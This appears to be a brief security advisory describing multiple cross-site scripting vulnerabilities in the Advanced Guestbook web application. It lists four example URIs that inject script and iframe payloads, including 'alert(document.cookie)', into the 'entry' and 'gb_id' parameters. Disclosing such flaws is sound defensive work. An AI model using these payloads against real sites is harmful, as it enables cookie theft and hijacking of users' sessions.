Advanced Guestbook Multiple Cross-Site Scripting Vulnerabilities

Advanced Guestbook Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

Example URIs have been provided:

http://www.example.com/guestbook/index.php?entry=<script>alert(document.cookie);</script>
http://www.example.com/guestbook/index.php?entry=<iframesrc=http://www.example.com/>

http://www.example.com/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script>
http://www.example.com/guestbook/comment.php?gb_id=1<IFRAMESRC="javascript:alert('XSS');"></IFRAME>